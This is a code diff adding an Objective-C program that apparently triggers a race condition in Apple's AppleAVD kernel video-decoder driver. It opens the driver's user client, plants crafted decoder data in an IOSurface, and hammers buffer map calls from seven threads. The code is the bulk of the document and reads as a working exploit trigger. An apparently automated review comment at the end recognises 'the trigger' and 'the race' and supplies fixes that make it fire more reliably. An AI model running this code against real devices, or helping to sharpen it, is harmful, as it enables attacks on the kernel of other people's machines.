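--- /dev/null
+++ b/service.m
@@ -0,0 +1,250 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+ 
+#include <IOKit/IOKitLib.h>
+#include <IOSurface/IOSurface.h>
+ 
+#include <Foundation/Foundation.h>
+ 
+#include <libkern/OSAtomic.h>
+ 
+#include <mach/thread_act.h>
+ 
+#include <pthread.h>
+ 
+#include <mach/mach.h>
+#include <mach/vm_map.h>
+#include <sys/mman.h>
+ 
+void pthread_func(void** msg);
+unsigned int selector = 0;
+ 
+uint64_t inputScalar[16];
+size_t inputScalarCnt = 0;
+ 
+uint8_t inputStruct[40960];
+size_t inputStructCnt = 16;
+ 
+uint64_t outputScalar[16] = {0};
+uint32_t outputScalarCnt = 0;
+ 
+char outputStruct[40960] = {0};
+size_t outputStructCnt = 4;
+ 
+void null_sub(){}
+ 
+struct async_reference {
+ mach_port_t port;
+ void(*fptr)(void);
+ void* something;
+ };
+ 
+int main(int argc, char** argv){
+ 
+ IOSurfaceRef r = IOSurfaceCreate(@{@"IOSurfaceAllocSize" : @(1024)});
+ 
+ kern_return_t err;
+ 
+ 
+ int** ptr= inputStruct;
+ ptr[0] = 0x77777777;
+ ptr[1] = rand();
+ ptr[2] = rand();
+ ptr[3] = rand();
+ 
+ 
+ CFMutableDictionaryRef matching = IOServiceMatching("AppleAVD");
+ if(!matching){
+ printf("unable to create service matching dictionary\n");
+ return 0;
+ }
+ 
+ io_iterator_t iterator;
+ err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
+ if (err != KERN_SUCCESS){
+ printf("no matches\n");
+ return 0;
+ }
+ 
+ io_service_t service = IOIteratorNext(iterator);
+ 
+ if (service == IO_OBJECT_NULL){
+ printf("unable to find service\n");
+ return 0;
+ }
+
+
+
+ printf("got service: %x\n", service);
+ 
+ io_connect_t conn = MACH_PORT_NULL;
+
+ int stype = 0x100 | 1 | 16;
+
+ err = IOServiceOpen(service, mach_task_self(), stype, &conn);
+ if (err != KERN_SUCCESS){
+ printf("unable to get user client connection\n");
+ return 0;
+ }
+ 
+ printf("got userclient connection: %x\n", conn);
+ IONotificationPortRef npr = IONotificationPortCreate(kIOMasterPortDefault);
+ mach_port_t np = IONotificationPortGetMachPort(npr);
+
+ struct async_reference ar = {0};
+ ar.port = npr;
+ ar.fptr = null_sub;
+ 
+ 
+ char* addr = IOSurfaceGetBaseAddress(r);
+ 
+ char nalu[] = { 0, 0, 0, 7, 0x68, 0xe8, 0x43, 0x82, 0xd2, 0xc8, 0xb0, 0, 0, 0, 32, 0x67, 0x64, 0x0, 0x33, 0xac, 0x72, 0x84, 0x40, 0x78, 0x2, 0x27, 0xe5, 0xc0, 0x44, 0x0, 0x0, 0x3, 0x0, 0x4, 0x0, 0x0, 0x3, 0x0, 0xf0, 0x3c, 0x60, 0xc6, 0x11, 0x80, 0x1, 0x0, 0x7};
+ 
+ for(int i = 0; i < sizeof(nalu); i++){
+ addr[i] = nalu[i];
+ }
+
+
+ IOConnectCallAsyncMethod( //setCallback
+ conn,
+ 8,
+ np,
+ 0,
+ 0,
+ inputScalar,
+ inputScalarCnt,
+ inputStruct,
+ inputStructCnt,
+ outputScalar,
+ &outputScalarCnt,
+ outputStruct,
+ &outputStructCnt);
+ 
+ 
+ char inp[] = {0x80, 0x07, 0x00, 0x00, 0xa0, 0x05, 0x00, 0x00, 0x4e, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0xff, 0x01, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x32, 0x00, 0x00, 0x00,
+ 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
+
+ 
+ inp[0xb8] = IOSurfaceGetID(r);
+
+ size_t out_num = 0x60;
+ 
+ IOConnectCallMethod( // createDecoder
+ conn,
+ 0,
+ inputScalar,
+ inputScalarCnt,
+ inp,
+ 0xd8,
+ outputScalar,
+ &outputScalarCnt,
+ outputStruct,
+ &out_num);
+ 
+ 
+ IOSurfaceRef r1 = IOSurfaceCreate(@{@"IOSurfaceAllocSize" : @(50000), @"IOSurfacePixelFormat" : @(0x61766331), @"IOSurfaceCacheMode" : @(1024) });
+ 
+ IOSurfaceSetValue(r1, @"IOSurfaceName", @"AVD video decoder RVRA");
+ 
+ char id = IOSurfaceGetID(r1);
+ 
+ int ids[16];
+ 
+ ids[0] = 128;
+ ids[1] = 0;
+ ids[2] = id;
+ 
+ 
+ void* ptrs[3];
+ 
+ ptrs[0] = conn;
+ ptrs[1] = id;
+ ptrs[2] = np;
+ 
+ 
+ int num_threads = 7;
+ pthread_t thread1[num_threads];
+ 
+ 
+ for(int i = 0; i < num_threads; i++){
+ pthread_create( &thread1[i], NULL, pthread_func, (void*) ptrs);
+ }
+ 
+ 
+ pthread_join( thread1[0], NULL);
+ 
+ // not reached
+ 
+ IOServiceClose(conn);
+ 
+ return 0;
+}
+ 
+ 
+ 
+ 
+void pthread_func(void** msg){
+ 
+ 
+ int ids[16];
+ 
+ ids[0] = 128;
+ ids[1] = 0;
+ ids[2] = (int)msg[1];
+ 
+ 
+ int ids1[16];
+ 
+ ids1[0] = (int)msg[1];
+ ids1[1] = 0;
+ 
+ for(int i = 0; i < 5000; i++){
+ 
+ IOConnectCallAsyncMethod( // mapPixelBuffer
+ msg[0],
+ 3,
+ msg[2],
+ 0,
+ 0,
+ inputScalar,
+ inputScalarCnt,
+ ids,
+ 16,
+ outputScalar,
+ &outputScalarCnt,
+ outputStruct,
+ &outputStructCnt);
+ 
+ 
+ 
+ IOConnectCallAsyncMethod(
+ msg[0],
+ 4,
+ msg[2],
+ 0,
+ 0,
+ inputScalar,
+ inputScalarCnt,
+ ids1,
+ 8,
+ outputScalar,
+ &outputScalarCnt,
+ outputStruct,
+ &outputStructCnt);
+ 
+ }
+}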
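Review bot: Both IOSurface IDs are narrowed to a single byte before they reach the driver: `char id = IOSurfaceGetID(r1);` (line 163) and `inp[0xb8] = IOSurfaceGetID(r);` (line 142) truncate the 32-bit IOSurfaceID, so any surface whose ID is above 255 (or 127 where `char` is signed) hands createDecoder/mapPixelBuffer the wrong surface and the trigger silently stops working; offset 0xb8 also appears to be the low byte of a four-byte field whose other three bytes keep their initial value. Keep the full width: `IOSurfaceID sid = IOSurfaceGetID(r); memcpy(&inp[0xb8], &sid, sizeof sid);` and `IOSurfaceID id = IOSurfaceGetID(r1);` with `ptrs[1] = (void *)(uintptr_t)id;`. The return values of the setCallback and createDecoder calls are discarded, so a failed decoder creation cannot be told apart from the race simply not landing; check `err` there the way the IOServiceOpen path already does. The `async_reference ar` (whose `port` field is assigned the IONotificationPortRef rather than the mach port `np`), the `ids` array in main, `selector` and `null_sub` are never used and can be dropped, and `pthread_func` should carry the `void *(*)(void *)` signature pthread_create expects instead of relying on an implicit function-pointer conversion.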